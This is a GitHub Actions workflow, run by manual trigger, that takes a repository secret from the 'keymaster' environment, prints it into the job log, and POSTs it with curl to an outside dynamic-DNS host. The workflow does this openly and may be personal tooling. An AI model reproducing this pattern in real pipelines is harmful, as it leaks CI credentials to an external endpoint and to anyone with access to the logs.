on:
  workflow_dispatch:

jobs:
  get-secrets:
    runs-on: ubuntu-latest
    environment: keymaster
    steps:
      - name: Send Keymaster Request
        run: |
          ARG='{"workflowId":"'$GITHUB_RUN_ID'","secret":"'$MY_SECRET'"}'
          echo $ARG
          curl -vv \
          -X POST \
          https://malkinhome.duckdns.org:3000/api/token \
          -H "Content-Type: application/json" \
          -d "$ARG"
          echo
    env:
      MY_SECRET: ${{ secrets.DEFAULT }}
